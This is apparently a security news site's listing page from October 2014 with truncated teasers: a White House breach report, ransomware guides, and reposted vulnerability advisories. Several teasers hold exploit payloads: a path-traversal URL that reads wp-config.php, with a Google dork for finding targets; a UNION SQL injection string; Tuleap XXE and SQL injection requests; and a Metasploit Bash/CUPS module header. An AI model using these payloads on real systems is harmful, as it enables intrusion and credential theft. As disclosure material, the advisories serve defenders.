White House computer network ‘hacked’

29 October 2014 - Source: http://www.mondounix.com

A White House computer network has been breached by hackers, it has been reported.

The unclassified Executive Office of the President network was attacked, according to the Washington Post.

US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said.

White House officials believe the attack was state-sponsored but are not saying what - if any - data was taken.

In a statement to the AFP news agency, the White House said "some elements of the unclassified network" had been affected.

A White House official, speaking on condition of anonymity, told the Washington...

Read more »

NuevoLabs flash player for clipshare SQL Injection

29 October 2014 - Source: http://www.mondounix.com
Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nuevoplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most 
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity:...

Read more »

Tuleap 7.4.99.5 Remote Command Execution

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of requests submitted to the SVN handler pages to check whether input passed to the passthru() function introduces extra parameters that would be executed in the context of the application.
 
External attackers can exploit this vulnerability to introduce external commands into the workflow of the application, which then executes them, as shown in the Proof of Concept code below.
 
After registering with the application...

Read more »

Tuleap 7.2 XXE Injection

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
Multiple XML External Entity Injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload an XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)...

Read more »

Tuleap 7.4.99.5 Blind SQL Injection

29 October 2014 - Source: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent:...

Read more »

Ransomware Virus Removal, Even for Non-Expert Users

28 October 2014 - Source: http://www.mondounix.com
A ransomware is a virus that encrypts all the data on the hard disk and prevents Windows from starting normally, showing a screen that demands money in exchange for the data on the hard disk.


Here is a step-by-step guide to removing the virus...
What you need:
1) The infected PC (obviously)
2) A blank CD or DVD
3) Another PC (or the infected PC with an Internet connection)


Procedure:
These kinds of viruses are essentially designed to panic the average user, so one piece of advice to follow: stay calm and stay focused on how the virus behaves, because like everything else, viruses have vulnerabilities too.
That said, we can begin.
1) At startup...

Read more »

Ransomware web alert: the malware that scams by phone

28 October 2014 - Source: http://www.mondounix.com

RANSOMWARE

From one moment to the next you may find yourself held hostage by hackers, with your computer unexpectedly locked.
And the only way to unlock it is to call a very expensive premium-rate number.
It is all the fault of a piece of malware, reports the Centro Nazionale Anticrimine Informatico per la Protezione delle Infrastrutture Critiche of the Servizio Polizia Postale e delle Comunicazioni, called "Ransomware", a trojan known to many Internet users (only those running Windows operating systems on their computers) for having hit them as far back as 2006.

Back then it blocked use of the computer and then demanded an unlock code, obtainable...

Read more »

CUPS Filter Bash Environment Variable Code Injection

28 October 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas',...

Read more »

WordPress Download Manager Arbitrary File Download

28 October 2014 - Source: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

...

Read more »

WordPress HTML5 / Flash Player SQL Injection

28 October 2014 - Source: http://www.mondounix.com
# WordPress HTML5 and Flash Player Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...

Read more »